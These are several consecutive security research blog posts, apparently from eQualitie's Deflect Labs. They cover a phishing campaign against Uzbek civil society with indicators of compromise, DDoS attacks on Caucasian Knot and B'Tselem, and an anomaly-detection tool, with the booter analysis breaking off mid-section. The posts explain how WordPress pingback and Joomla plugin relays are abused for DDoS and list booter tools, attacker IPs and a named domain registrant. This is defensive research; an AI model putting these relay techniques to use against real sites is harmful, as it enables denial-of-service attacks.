We think that the phishing page stayed online only for a short time after having sent the email in order to avoid detection. We got access to the phishing page of a few emails. We could confirm that the phishing toolkit checked if the password is correct or not (against the actual gmail account) and suspect that they implemented 2 Factor authentication for text messages and 2FA applications, but could not confirm this.
Timeline for the campaign
We found the first evidence of activity in this operation with the registration of domain auth-login[.]com
on the 21st of February 2016. Because we discovered the campaign recently, we have little information on attacks during 2016 and 2017, but the domain registration date shows some activity in July and December 2016, and then again in August and October 2017. It is very likely that the campaign started in 2016 and continued in 2017 without any public reporting about it.
Here is a first timeline we obtained based on domain registration dates and dates of web attacks and phishing emails :
To confirm that this group had some activity during 2016 and 2017, we gathered encryption (TLS) certificates for these domains and sub-domains from the crt.sh Certificate Transparency Database. We identified 230 certificates generated for these domains, most of them created by Cloudfare. Here is a new timeline integrating the creation of TLS certificates :
We see here many certificates created since December 2016 and continuing over 2017, which shows that this group had some activity during that time. The large number of certificates over 2017 and 2018 comes from campaign operators using Cloudflare for several domains. Cloudflare creates several short-lived certificates at the same time when protecting a website.
It is also interesting to note that the campaign started in February 2016, with some activity in the summer of 2016, which happens to when the former Uzbek president Islam Karimov died, news first reported by Fergana News, one of the targets of this attack campaign.
Infrastructure Analysis
We identified domains and subdomains of this campaign through analysis of passive DNS information, using mostly the Community access of PassiveTotal. Many domains in 2016/2017 reused the same registrant email address, b.adan1@walla.co.il
, which helped us identify other domains related to this campaign :
Based on this list, we identified subdomains and IP addresses associated with them, and discovered three IP addresses used in the operation. We used Shodan historical data and dates of passive DNS data to estimate the timeline of the utilisation of the different servers :
- 46.45.137.74 was used in 2016 and 2017
- 139.60.163.29 was used between October 2017 and August 2018
- 51.15.94.245 was used between September and February 2019
We have identified 74 sub-domains for 26 second-level domains used in this campaign (see the appendix for a full list of IOCs). Most of these domains are mimicking Gmail, but there are also domains mimicking Yandex (auth.yandex.ru.my-id[.]top
), mail.ru (mail.ru.my-id[.]top
) qip.ru (account.qip.ru.mail-help-support[.]info
), yahoo (auth.yahoo.com.mail-help-support[.]info
), Live (login.live.com.mail-help-support[.]info
) or rambler.ru (mail.rambler.ru.mail-help-support[.]info
). Most of these domains are sub-domains of a few generic second-level domains (like auth-mail.com
), but there are a few specific second-level domains that are interesting :
bit-ly[.]host
mimicking bit.lym-youtube[.]top
andm-youtube[.]org
for Youtubeecoit[.]email
which could mimick https://www.ecoi.netpochta[.]top
likely mimick https://www.pochta.ru/, the Russian Post website- We have not found any information on
vzlom[.]top
andfixerman[.]top
. Vzlom means “break into” in Russian, so it could have hosted or mimicked a security website
A weird Cyber-criminality Nexus
It is quite unusual to see connections between targeted attacks and cyber-criminal enterprises, however during this investigation we encountered two such links.
The first one is with the domain msoffice365[.]win
which was registered by b.adan1@walla.co.il
(as well as many other domains from this campaign) on the 7th of December 2016. This domain was identified as a C2 server for a cryptocurrency theft tool called Quant, as described in this Forcepoint report released in December 2017. Virus Total confirms that this domain hosted several samples of this malware in November 2017 (it was registered for a year). We have not seen any malicious activity from this domain related to our campaign, but as explained earlier, we have marginal access to the group’s activity in 2017.
The second link we have found is between the domain auth-login[.]com
and the groups behind the Bedep trojan and the Angler exploit kit. auth-login[.]com
was linked to this operation through the subdomain login.yandex.ru.auth-login[.]com
that fit the pattern of long subdomains mimicking Yandex from this campaign and it was hosted on the same IP address 46.45.137.74 in March and April 2016 according to RiskIQ. This domain was registered in February 2016 by yingw90@yahoo.com
(David Bowers from Grovetown, GA in the US according to whois information). This email address was also used to register hundreds of domains used in a Bedep campaign as described by Talos in February 2016 (and confirmed by several other reports). Angler exploit kit is one of the most notorious exploit kit, that was commonly used by cyber-criminals between 2013 and 2016. Bedep is a generic backdoor that was identified in 2015, and used almost exclusively with the Angler exploit kit. It should be noted that Trustwave documented the utilization of Bedep in 2015 to increase the number of views of pro-Russian propaganda videos.
Even if we have not seen any utilisation of these two domains in this campaign, these two links seem too strong to be considered cirmcumstantial. These links could show a collaboration between cyber-criminal groups and state-sponsored groups or services. It is interesting to remember the potential involvement of Russian hacking groups in attacks on Uznews.net editor in 2014, as described by Amnesty international.
Taking Down Servers is Hard
When the attack was discovered, we decided to investigate without sending any abuse requests, until a clearer picture of the campaign emerged. In January, we decided that we had enough knowledge of the campaign and started to send abuse requests – for fake Gmail addresses to Google and for the URL shorteners to Doctor Web. We did not receive any answer but noticed that the Doctor Web URLs were taken down a few days after.
Regarding the Scaleway server, we entered into an unexpected loop with their abuse process. Scaleway operates by sending the abuse request directly to the customer and then asks them for confirmation that the issue has been resolved. This process works fine in the case of a compromised server, but does not work when the server was rented intentionally for malicious activities. We did not want to send an abuse request because it would have involved giving away information to the operators. We contacted Scaleway directly and it took some time to find the right person on the security team. They acknowledged the difficulty of having an efficient Abuse Process, and after we sent them an anonymized version of this report along with proof that phishing websites were hosted on the server, they took down the server around the 25th of January 2019.
Being an infrastructure provider, we understand the difficulty of dealing with abuse requests. For a lot of hosting providers, the number of requests is what makes a case urgent or not. We encourage hosting providers to better engage with organisations working to protect Civil Society and establish trust relationships that help quickly mitigate the effects of malicious campaigns.
Conclusion
In this report, we have documented a prolonged phishing and web attack campaign focusing on media covering Uzbekistan and Uzbek human right activists. It shows that once again, digital attacks are a threat for human-right activists and independent media. There are several threat actors known to use both phishing and web attacks combined (like the Vietnam-related group Ocean Lotus), but this campaign shows a dual strategy targeting civil society websites and their editors at the same time.
We have no evidence of government involvement in this operation, but these attacks are clearly targeted on prominent voices of Uzbek civil society. They also share strong similarities with the hack of Uznews.net in 2014, where the editor’s mailbox was compromised through a phishing email that appeared as a notice from Google warning her that the account had been involved in distributing illegal pornography.
Over the past 10 years, several organisations like the Citizen Lab or Amnesty International have dedicated lots of time and effort to document digital surveillance and targeted attacks against Civil Society. We hope that this report will contribute to these efforts, and show that today, more than ever, we need to continue supporting civil society against digital surveillance and intrusion.
Counter-Measures Against such Attacks
If you think you are targeted by similar campaigns, here is a list of recommendations to protect yourself.
Against phishing attacks, it is important to learn to recognize classic phishing emails. We give some examples in this report, but you can read other similar reports by the Citizen Lab. You can also read this nice explanation by NetAlert and practice with this Google Jigsaw quizz. The second important point is to make sure that you have configured 2-Factor Authentication on your email and social media accounts. Two-Factor Authentication means using a second way to authenticate when you log-in besides your password. Common second factors include text messages, temporary password apps or hardware tokens. We recommend using either temporary password apps (like Google Authenticator; FreeOTP) or Hardware Keys (like YubiKeys). Hardware keys are known to be more secure and strongly recommended if you are an at-risk activist or journalist.
Against web attacks, if you are using a CMS like WordPress or Drupal, it is very important to update both the CMS and its plugins very regularly, and avoid using un-maintained plugins (it is very common to have websites compromised because of outdated plugins). Civil society websites are welcome to apply to Deflect for free website protection.
Appendix
Acknowledgement
We would like to thank Front Line Defenders and Scaleway for their help. We would also like to thank ipinfo.io and RiskIQ for their tools that helped us in the investigation.
Indicators of Compromise
Top level domains :
email-service.host email-session.host support-email.site support-email.host email-support.host myconnection.website ecoit.email my-cabinet.com my-id.top msoffice365-online.org secretonline.top m-youtube.top auth-mail.com mail-help-support.info mail-support.info auth-mail.me auth-login.com email-x.com auth-mail.ru mail-auth.top msoffice365.win bit-ly.host m-youtube.org vzlom.top pochta.top fixerman.top
You can find a full list of indicators on github : https://github.com/equalitie/deflect_labs_6_indicators
eQualitie statement on the detention of Ola Bini
EMBASSY OF ECUADOR
99 Bank, Suite 230
Ottawa, Ontario
K1P 6B9
To the Ambassador of Ecuador in Canada – Mr. Diego Stacey Moreno and to the Minister of Political and Economic Affairs, Mrs. Elizabeth Moreano,
On April 11, data privacy and open source advocate Ola Bini was arrested at the Quito International Airport, where he was accused of “conspiring against the state”. As of yet, no formal charges have been made, and Ola continues to be in pretrial detention. eQualitie wants to remind Ecuadorian authorities of their obligations before ratified treaties and international covenants ensuring that detained persons are treated humanely, and are not subjected to cruel, inhuman, or degrading treatment or punishment; as well as Article 89 of the Ecuadorian constitution ensuring habeas corpus proceedings. If there is a case to be brought against Ola, the authorities should present it and allow the judicial process to run its course. If not, Ola should be considered innocent until proven guilty, and released from detention.
Respectfully,
The eQualitie team
eQualitie is a Canadian organization developing open and reusable systems with a focus on privacy, resilience and self-determination. Our goal is to create accessible technology to promote and defend human rights on the Internet. Our approach and motivation is described in the eQualitie Manifesto.
Deflect Labs Report #5 – Baskerville
Using Machine Learning to Identify Cyber Attacks
The Deflect platform is a free website security service defending civil society and human rights groups from digital attack. Currently, malicious traffic is identified on the Deflect network by Banjax, a system that uses handwritten rules to flag IPs that are behaving like attacking bots, so that they can be challenged or banned. While Banjax is successful at identifying the most common bruteforce cyber attacks, the approach of using a static set of rules to protect against the constantly evolving tools available to attackers is fundamentally limited. Over the past year, the Deflect Labs team has been working to develop a machine learning module to automatically identify malicious traffic on the Deflect platform, so that our mitigation efforts can keep pace with the methods of attack as these grow in complexity and sophistication.
In this report, we look at the performance of the Deflect Labs’ new anomaly detection tool, Baskerville, in identifying a selection of the attacks seen on the Deflect platform during the last year. Baskerville is designed to consume incoming batches of web logs (either live from a Kafka stream, or from Elasticsearch storage), group them into request sets by host website and IP, extract the browsing features of each request set, and make a prediction about whether the behaviour is normal or not. At its core, Baskerville currently uses the Scikit-Learn implementation of the Isolation Forest anomaly detection algorithm to conduct this classification, though the engine is agnostic to the choice of algorithm and any trained Scikit-Learn classifier can be used in its place. This model is trained on normal web traffic data from the Deflect platform, and evaluated using a suite of offline tools incorporated in the Baskerville module. Baskerville has been designed in such a way that once the performance of the model is sufficiently strong, it can be used for real-time attack alerting and mitigation on the Deflect platform.
To showcase the current capabilities of the Baskerville module, we have replayed the attacks covered in the 2018 Deflect Labs report: Attacks Against Vietnamese Civil Society, passing the web logs from these incidents through the processing and prediction engine. This report was chosen for replay because of the variety of attacks seen across its constituent incidents. There were eight attacks in total considered in this report, detailed in the table below.
Date | Start (approx.) | Stop (approx.) | Target |
2018/04/17 | 08:00 | 10:00 | viettan.org |
2018/04/17 | 08:00 | 10:00 | baotiengdan.com |
2018/05/04 | 00:00 | 23:59 | viettan.org |
2018/05/09 | 10:00 | 12:30 | viettan.org |
2018/05/09 | 08:00 | 12:00 | baotiengdan.com |
2018/06/07 | 01:00 | 05:00 | baotiengdan.com |
2018/06/13 | 03:00 | 08:00 | baotiengdan.com |
2018/06/15 | 13:00 | 23:30 |
baotiengdan.com |
Table 1: Attack time periods covered in this report. The time period of each attack was determined by referencing the number of Deflect and Banjax logs recorded for each site, relative to the normal traffic volume.
How does it work?
Given one request from one IP, not much can be said about whether or not that user is acting suspiciously, and thus how likely it is that they are a malicious bot, as opposed to a genuine user. If we instead group together all the requests to a website made by one IP over time, we can begin to build up a more complete picture of the user’s browsing behaviour. We can then train an anomaly detection algorithm to identify any IPs that are behaving outside the scope of normal traffic.
The boxplots below illustrate how the behaviour during the Vietnamese attack time periods differs from that seen during an average fortnight of requests to the same sites. To describe the browsing behaviour, 17 features (detailed in the Baskerville documentation) have been extracted based on the request sets (note that the feature values are scaled relative to average distributions, and do not have a physical interpretation). In particular, it can be seen that these attack time periods stand out by having far fewer unique paths requested (unique_path_to_request_ratio), a shorter average path depth (path_depth_average), a smaller variance in the depth of paths requested (path_depth_variance), and a lower payload size (payload_size_log_average). By the ‘path depth’, we mean the number of slashes in the requested URL (so ‘website.com’ has a path depth of zero, and ‘website.com/page1/page2’ has a path depth of two), and by ‘payload size’ we mean the size of the request response in bytes.
Figure 1: The distributions of the 17 scaled feature values during attack time periods (red) and non-attack time periods (blue). It can be seen that the feature distributions are notably different during the attack and non-attack periods.
The separation between the attack and non-attack request sets can be nicely visualised by projecting along the feature dimensions identified above. In the three-dimensional space defined by the average path depth, the average log of the payload size, and the unique path to request ratio, the request sets identified as malicious by Banjax (red) are clearly separated from those not identified as malicious (blue).
Figure 2: The distribution of request sets along three of the 17 feature dimensions for IPs identified as malicious (red) or benign (blue) by the existing banning module, Banjax. The features shown are the average path depth, the average log of the request payload size, and the ratio of unique paths to total requests, during each request set. The separation between the malicious (red) and benign (blue) IPs is evident along these dimensions.
Training a Model
A machine learning classifier enables us to more precisely define the differences between normal and abnormal behaviour, and predict the probability that a new request set comes from a genuine user. For this report, we chose to train an Isolation Forest; an algorithm that performs well on novelty detection problems, and scales for large datasets.
As an anomaly detection algorithm, the Isolation Forest took as training data all the traffic to the Vietnamese websites over a normal two-week period. To evaluate its performance, we created a testing dataset by partitioning out a selection of this data (assumed to represent benign traffic), and combining this with the set of all requests coming from IPs flagged by the Deflect platform’s current banning tool, Banjax (assumed to represent malicious traffic). There are a number of tunable parameters in the Isolation Forest algorithm, such as the number of trees in the forest, and the assumed contamination with anomalies of the training data. Using the testing data, we performed a gridsearch over these parameters to optimize the model’s accuracy.
Replaying the Attacks
The model chosen for use in this report has a precision of 0.90, a recall of 0.86, and a resultant f1 score of 0.88, when evaluated on the testing dataset formulated from the Vietnamese website traffic, described above. If we take the Banjax bans as absolute truth (which is almost certainly not the case), this means that 90% of the IPs predicted as anomalous by Baskerville were also flagged by Banjax as malicious, and that 88% of all the IPs flagged by Banjax as malicious were also identified as anomalous by Baskerville, across the attacks considered in the Vietnamese report. This is demonstrated visually in the graph below, which shows the overlap between the Banjax flag and the Baskerville prediction (-1 indicates malicious, and +1 indicates benign). It can be seen that Baskerville identifies almost all of the IPs picked up by Banjax, and additionally flags a fraction of the IPs not banned by Banjax.
Figure 3: The overlap between the Banjax results (x-axis) and the Baskerville prediction results (colouring). Where the Banjax flag is -1 and the prediction colour is red, both Banjax and Baskerville agree that the request set is malicious. Where the Banjax flag is +1 and the prediction colour is blue, both modules agree that the request set is benign. The small slice of blue where the Banjax flag is -1, and the larger red slice where the Banjax flag is +1, indicate request sets about which the modules do not agree.
The performance of the model can be broken down across the different attack time periods. The grouped bar chart below compares the number of Banjax bans (red) to the number of Baskerville anomalies (green). In general, Baskerville identifies a much greater number of request sets as being malicious than Banjax does, with the exception of the 17th April attack, for which Banjax picked up slightly more IPs than Baskerville. The difference between the two mitigation systems is particularly pronounced on the 13th and 15th June attacks, for which Banjax scarcely identified any malicious IPs at all, but Baskerville identified a high proportion of malicious IPs.
Figure 4: The verdicts of Banjax (left columns) and Baskerville (right columns) across the 6 attack periods. The red/green components show the number of request sets that Banjax/Baskerville labelled as malicious, while the blue/purple components show the number that they labelled as benign. The fact that the green bars are almost everywhere higher than the red bars indicates that Baskerville picks up more traffic as malicious than does Banjax.
This analysis highlights the issue of model validation. It can be seen that Baskerville is picking up more request sets as being malicious than Banjax, but does this indicate that Baskerville is too sensitive to anomalous behaviour, or that Baskerville is outperforming Banjax? In order to say for sure, and properly evaluate Baskerville’s performance, a large testing set of labelled data is needed.
If we look at the mean feature values across the different attacks, it can be seen that the 13th and 15th June attacks (the red and blue dots, respectively, in the figure below) stand out from the normal traffic in that they have a much lower than normal average path depth (path_depth_average), and a much higher than normal 400-code response rate (response4xx_to_request_ratio), which may have contributed to Baskerville identifying a large proportion of their constituent request sets as malicious. Since a low average path depth (e.g. lots of requests made to ‘/’) and a high 400 response code rate (e.g. lots of requests to non-existent pages) are indicative of an IP behaving maliciously, this may suggest that Baskerville’s predictions were valid in these cases. But more labelled data is required for us to be certain about this evaluation.
Figure 5: Breakdown of the mean feature values during the two attack periods (red, blue) for which Baskerville identified a high proportion of malicious IPs, but Banjax did not. These are compared to the mean feature values during a normal two-week period (green).
Putting Baskerville into Action
Replaying the Vietnamese attacks demonstrates that it is possible for the Baskerville engine to identify cyber attacks on the Deflect platform in real time. While Banjax mitigates attacks using a set of static human-written rules describing what abnormal traffic looks like, by comprehensively describing how normal traffic behaves, the Baskerville classifier is able to identify new types of malicious behaviour that have never been seen before.
Although the performance of the Isolation Forest in identifying the Vietnamese attacks is promising, we would require a higher level of accuracy before the Baskerville engine is used to automatically ban IPs from accessing Deflect websites. The model’s accuracy can be improved by increasing the amount of data it is trained on, and by performing additional feature engineering and parameter tuning. However, to accurately assess its skill, we require a large set of labelled testing data, more complete than what is offered by Banjax logs. To this end, we propose to first deploy Baskerville in a developmental stage, during which IPs that are suspected to be malicious will be served a Captcha challenge rather than being absolutely banned. The results of these challenges can be added to the corpus of labelled data, providing feedback on Baskerville’s performance.
In addition to the applications of Baskerville for attack mitigation on the Deflect platform, by grouping incoming logs by host and IP into request sets, and extracting features from these request sets, we have created a new way to visualise and analyse attacks after they occur. We can compare attacks not just by the IPs involved, but also by the type of behaviour displayed. This opens up new possibilities for connecting disparate attacks, and investigating the agents behind them.
Where Next?
The proposed future of Deflect monitoring is the Deflect Labs Information Sharing and Analysis Centre (DL-ISAC). The underlying idea behind this project, summarised in the schematic below, is to split the Baskerville engine into separate User Module and Clearinghouse components (dealing with log processing and model development, respectively), to enable a complete separation of personal data from the centralised modelling. Users would process their own web logs locally, and send off feature vectors (devoid of IP and host site details) to receive a prediction. This allows threat-sharing without compromising personally identifiable information (PII). In addition, this separation would enable the adoption of the DL-ISAC by a much broader range of clients than the Deflect-hosted websites currently being served. Increasing the user base of this software will also increase the amount of browsing data we are able to collect, and thus the strength of the models we are able to train.
Baskerville is an open-source project, with its first release scheduled next quarter. We hope this will represent the first step towards enabling a new era of crowd-sourced threat information sharing and mitigation, empowering internet users to keep their content online in an increasingly hostile web environment.
Figure 6: A schematic of the proposed structure of the DL-ISAC. The infrastructure is split into a log-processing user endpoint, and a central clearinghouse for prediction, analysis, and model development.
A Final Word: Bias in AI
In all applications of machine learning and AI, it is important to consider sources of algorithmic bias, and how marginalised users could be unintentionally discriminated against by the system. In the context of web traffic, we must take into account variations in browsing behaviour across different subgroups of valid, non-bot internet users, and ensure that Baskerville does not penalise underrepresented populations. For instance, checks should be put in place to prevent disadvantaged users with slower internet connections from being banned because their request behaviour differs from those users that benefit from high-speed internet. The Deflect Labs team is committed to prioritising these considerations in the future development of the DL-ISAC.
News from Deflect Labs: DDoS attacks against Caucasian Knot
Key Findings
- In November and December 2018, we identified 3 DDoS attacks against independent media website Кавказский Узел (Caucasian Knot)
- The first attack was by far the largest DDoS attack seen by the Deflect project in 2018, clocking over 7.7 million queries in 4 hours
- The three attacks used different types of relays, including open proxies, botnets and WordPress pingbacks. We could not find any technical intersection between the incidents to point to their orchestration or provenance.
Context
Caucasian Knot is an online media covering the Caucasus, comprised of 20 regions from the North and South Caucasus. The publication has eleven thematic areas with a focus on human right issues. Several reporters paid the ultimate price for their journalism, including Akhmednabi Akhmednabiev, killed in Dagestan in 2013. Another young Chechen journalist Zhalaudi Geriev, was kidnapped and tortured in 2016, and is now in Chernokozovo prison. On several occasions, Chechen government officials have publicly called for violence against Caucasian Knot reports and editors.
Caucasian Knot has received several journalism awards, including the The Free Press of Eastern Europe award in 2007 and the Sakharov prize in 2017.
First attack : millions of requests from open proxies on October 19th
The Caucasian Knot website joined Deflect on the 19th of October, under the barrel of a massive DDoS attack that had knocked their servers offline. Deflect logged over 7, 700, 000 queries to / on www.kavkaz-uzel.eu between 11h am and 3pm. This was by far the largest DDoS attack we have seen on Deflect in 2018.
The attack was coming from 351 different IP addresses doing requests to /, adding random HTTP queries to bypass any caching mechanism, with queries like GET /?tone=hot
or GET /?act=ring
, and often adding random referrers like http://www.google.com/translate?u=trade
or http://www.comicgeekspeak.com/proxy.php?url=hot
. Most of these IP addresses were open proxies used as relays, like the IP 94.16.116.191 which did more than 112 000 queries – listed as an open proxy on different proxy databases.
Many open-proxies are “transparent”, which mean that they do not add or remove any header, but it is common to have proxies adding a header X-Forwarded-for
with the origin IP address. Among the long list of proxies used, several of them actually added this header which revealed the IP addresses at the origin of the attack (an occurrence similar to what we’ve previously documented in Deflect Report #4)
- 157.52.132.202 1,157,759
- 157.52.132.196 1,127,194
- 157.52.132.191 1,018,789
- 157.52.132.190 1,008,426
- 157.52.132.197 984,914
These IPs are servers hosted by a provider called Global Frag, that propose servers with DDoS protection (sic!). We have sent an abuse request to this provider on the 19th of November and the servers were shutdown a few weeks after that (we cannot be sure if it was related to our abuse request). We have not recorded any other malicious traffic from these servers to the Deflect network.
Second attack: botnet attack on November 18th
On this day we identified a second, smaller attack targeting the same website.
The attack queried the / path more than 2 million times, this time without any query string to avoid caching, but the source of the attack is really different. Most of the attacks are coming from a botnet, with 1591positively identified IP addresses (top 10 countries listed here):
- 213 India
- 163 Indonesia
- 99 Brazil
- 63 Egypt
- 63 Morocco
- 59 Romania
- 58 Philippines
- 57 United States
- 46 Poland
- 44 Vietnam
A small subset of this attack was actually using the WordPress pingback method, generating around 30 000 requests. WordPress pingback attacks are DDoS attacks using WordPress websites with the pingback feature enabled as relay, which allows to generate traffic to the targeted website. A couple of years ago, the WordPress development team updated the user-agent used for pingback to include the IP address of the origin server. In our logs we see two different types of user-agents for the pingback :
- User agents before WordPress 3.8.2 having only the WordPress version and the website, like
WordPress/3.3.2; https://equalit.ie
- User-agents after version 3.8.1 having an extra field giving the IP address at the origin of the query like
WordPress/4.9.3; http://[REDACTED]; verifying pingback from 188.166.105.145
By analyzing user-agents of modern WordPress websites, we were able to distinguish the following 10 attack origin IPs:
45.76.34.217 - 2403 209.250.240.49 - 2396 188.166.43.4 - 2377 209.250.250.52 - 2362 209.250.255.162 - 2351 95.179.183.197 - 2347 174.138.13.37 - 2334 188.166.26.137 - 2274 188.166.125.216 - 2247 188.166.105.145 - 2238
All these IPs were actually part of a booter service (professional DDoS-for-hire) that also targeted BT’selem and that we described in detail in our Deflect Labs Report #4.
Third attack: WordPress PingBack and Botnets on the 3rd of December
On the 3rd of December around 3pm UTC, we saw a new attack targeting www.kavkaz-uzel.eu, again with requests only to /. On the diagram below we can see two peaks of traffic around 2h20 pm and 3pm when checking only the requests to / at that time :
Looking at the first peak of traffic, we were able to establish another instance of a WordPress Pingback attack with user agents like WordPress/3.3.2; http://[REDACTED]
or WordPress/4.1; http://[REDACTED]; verifying pingback from 185.180.198.124
. We analyzed the user-agents from this attack and identified 135 different websites used as relays, making a total of 67 000+ requests. Most of these websites were using recent WordPress version, showing the IP as the origin of this attack, 185.180.198.124
a server from king-servers.com. King Server is a Russian Server provider considered by some people to be a bullet-proof provider. Machines from King Servers were also used in the hack of Arizona and Illinois’ state board of elections in 2016. Upon closer inspection, we could not find any other interesting services running on this machine or proof that it was linked to a broader campaign. Among the 135 websites used as relay here, only 25 were also used in the 2nd attack described above, which seems to show that they are coming from an actor with a different list of WordPress relays.

Peak of traffic by user-Agent type, first peak colour is for WordPress user-agents, second peak color is for Chrome user-agents
The second peak of traffic was actually coming from a very different source: we identified 252 different IP addresses as the origin of this traffic, mostly coming from home Internet access routers, located in different countries. We think this second peak of traffic was from a small botnet of compromised end-systems. These systems were mostly located in Russia (32), Egypt (20), India (17), Turkey (14) and Thailand (10) as shown in the following map :
Conclusion
The first DDoS attack had a significant impact on the Caucasian Knot website, leading to their joining the Deflect service. It took us a few days to mitigate this attack, using specific filtering rules and javascript challenges to ban hosts. The second and third attacks were largely smaller and were automatically mitigated by Deflect.
In our follow up investigations we could not find a direct technical link to explain attackers’ motivation, however in all cases attacks were launched within a 24-hour window of a publication critical of the Chechen government and when countering its official narratives. We did not find any similar correlation with other thematic or region specific publications on this website, within a 24-hour window between publication and attack.
Infracon 2019 – Barcelona
Open Day
The Infracon Open Day invites technology groups, NGOs, organized civil society and media in Barcelona to discuss
Infracon – is a global conference for independent Internet service providers working on solutions for autonomous infrastructure. eQualitie and Pangea are bringing together several dozen organizations including Guifi.net, Greenhost, RiseUp, LEAP, Autistici, GreenNet, Colnodo, CodigoSur, AlterMundi, APC, MayFirst, Maadix, Sindominio among others, to work together on common web platforms, authentication systems and network solutions – creating viable alternatives to the corporate cloud.
Address:
Auditorium *
10:00h – 10:30h: BENVINGUDA I PRESENTACIÓ: Presentarem la jornada i les entitats organitzadores (castellà, anglès)
10:30h – 11:30h: “Censura d’internet al referèndum català”, que hem appres? (castellà, anglès)
Coffee break
11:45 – 13:00: Infracon panel: Digital autonomy and self-determination or how I learned to stop worrying and start loving the Internet: Greenhost; RiseUp; Sindominio, CodigoSur, Maadix (anglès, castellà)
Lunch time
14:30 – 15:30: Estratègies municipals per a l’apoderament digital: Presentació de les 46 Mesures per a l’apoderament digital als municipis. Eines i recursos per als ajuntaments apoderamentdigital.cat (castellà, anglès)
Coffee break
16:00 – 16:30 Infracon report back and what next for independent ISP (castellà)
16:30 – 17:30: InfraRed lightning talks: autonomous and secure solutions for hosting, communications and mobilisation (anglès)
* English < > Spanish translation provided in the auditorium
Workshop room
#1 12:00 – 13:00 Glocal Application Services in Community Networks
#3 14:30 – 16:00 Open space
Deflect Labs Report #4 – Anatomy of a booter
Key Findings
- We identified a DDoS attack against the Israeli human rights website www.btselem.org on the 2nd of November
- Attackers used three different type of relays to overload the website and were automatically mitigated by Deflect
- We identified the booter infrastructure (professional DDoS service) and accessed and analyzed its tools, which we describe in this article
- In cooperation with Digital Ocean, Google and other security response teams, we have managed to shut down some of the booter’s infrastructure running on their platforms. The booter is still operational however and continues to create new machines to launch attacks.
Introduction
On the 2nd of November 2018, we identified a DDoS attack against the Deflect-protected website www.btselem.org. B’Tselem is an Israeli non-profit organisation striving to end Israel’s occupation of the Palestinian territories. B’Tselem has been targeted by DDoS attacks many times in the past, including in 2013 and 2014, also when using Deflect protection in 2016. The organization has been facing pressure from the Israeli government for years, as well as from sectors of the Israeli public.
The attack on the 2nd of November was orchestrated from a booter infrastructure. A booter (also known as DDoSer or Stresser) is a DDoS-for-hire service with prices starting from as low as 15 dollars a month. Some services can support a huge number of DDoS attacks, like the booter vDoS (taken down in August 2017 by the Israeli police) which did more than 150 000 DDoS attacks and raised more than $600 000 over two years of activity. Now, the threat is taken seriously by police in many countries, leading to the dismantling of several booter services.
This attack is one of seventeen that we identified targeting the B’Tselem website in 2018. Most of the web attacks were using standard security audit tools such as Nikto, SQLMap or DirBuster launched from different IPs in Israel. All discovered DDoS attacks were using botnets to amplify the traffic load. The attack investigated in this report is the first example of a WordPress pingback attack against the btselem.org website in 2018.
In this article, we analyze the attack, including the tools and methods used by the booter.
Description of the Attack
On November 2nd, between midnight and 1am UTC, we identified an unusual peak of traffic to www.btselem.org. A large number of requests did not have any user-agent string or used a user-agent showing a WordPress pingback request (like WordPress/4.8.7; [REDACTED]; verifying pingback from 174.138.13.37
). We confirmed that this traffic is part of a DDoS effort using different types of relays. We have documented pingback attacks several times in the past and explain what they are in the 3rd Deflect Labs report.
btselem.org received 341 435 requests to / during that period of time, including 272 624 requests without user-agent, 65 887 requests with UA Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
and 2368 requests with different WordPress user-agents.
One interesting aspect of this traffic is that it targeted the domain btselem.org. This domain is configured to redirect to https://www.btselem.org through a 301 redirect HTTP code, but only a small part of the traffic actually followed the redirection and queried the final www website. We got 272,636 requests without user-agent on btselem.org during the attack, and only 34,035 on www.btselem.org.
Analyzing WordPress pingbacks
WordPress pingback attacks have been around since 2014 and we’ve had to deal with several pingback attacks before.
The idea is to abuse the WordPress pingback feature which is built to notify websites when they are being mentioned or linked-to, by another website. The source publication contacts the linked-to WordPress website, with the URL of the source. The linked-to website then replies to confirm receipt. By sending the initial pingback request with the target website as the source, it is possible to abuse this feature and use the WordPress website as a relay for a DDoS attack. To counter this threat, many hosting providers have disabled pingbacks overall, and the WordPress team has implemented an update to add the IP address at the origin of the request in the User-Agent from version 3.9. An attack using the website www.example.com as a relay would see user-agents like WordPress/3.5.1; http://www.example.com
before the version 3.9, and WordPress/3.9.16; http://www.example.com; verifying pingback from ORIGIN_IP
after. Unfortunately, many WordPress websites are not updated and can still be used as relay without displaying the source IP address.
By analyzing the WordPress user-agents during the attack, it is easy to map the websites used as relays :
- 2368 requests were from WordPress websites
- These requests were coming from 300 different WordPress websites used as relays
- 149 of them where above the version 3.9
The user-agents of WordPress websites over 3.9 shows the IPs at the origin of the attack : WordPress/4.1.24; http://[REDACTED]; verifying pingback from 178.128.244.42.
We identified 10 IPs as the origin of these attacks, all hosted on Digital Ocean servers which reveals the actual infrastructure of the booter. We describe hereafter the infrastructure identified and the actions we took to shut it down.
Analyzing other queries
The other part of the DDoS attack is a large number of requests to / without any query-string, also without either user-agent (272 624 requests) or with user-agent Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
(65 887 requests).
By analyzing samples of these IPs, we identified many of them as open proxies. For instance, we received 159 requests from IP 213.200.56[.]86, known to be an open proxy by several open proxy databases. We checked the X-Forwarded-For header which is set by some proxies to identify the origin IP doing the request, and identified again the same list of 10 Digital Ocean IPs at the source of the attack.
Finally, a small part of these requests remained from unknown sources until we discovered the Joomla relay list on the booter servers (see after). A common Joomla plugin called Google Maps2 has a vulnerability disclosed since 2013 that allows using it as a relay. It has been used several times for DDoS, especially around 2014. It is surprising to see such an old vulnerability being used, but we identified only 2678 requests which show that this attack is not very effective in 2018, likely due to small number of websites still vulnerable.
Anatomy of a Booter
Infrastructure
As described earlier, the analysis of WordPress PingBack user-agents and of X-Forwarded-For header from proxies gave us the following list of IP addresses, all hosted on Digital Ocean :
- 178.128.244.42
- 178.128.244.184
- 178.128.242.66
- 178.128.249.196
- 142.93.136.67
- 188.166.26.137
- 188.166.43.4
- 188.166.105.145
- 174.138.13.37
- 188.166.125.216
These 10 servers were running an Apache http server on port 80 with an open index file showing a list of tools used by the booters for DDoS attacks :
This open directory allowed us to download most of the tools and list of relays used by the booters.
Toolkit
We were able to download most of the tools used by the booter at the exception of PHP code files (the files being executed when the URL is requested). Overall we can see three types of files hosted on the booter :
- Command files in php :
api.php
andsockhit.php
- Tools : executable or javascript tools like
http.js
orjoomla
- Text files listing relays :
joomla.txt
,path.txt
,perfect.txt
,socks.txt
andxmlrpc.txt
Unprotected Commands
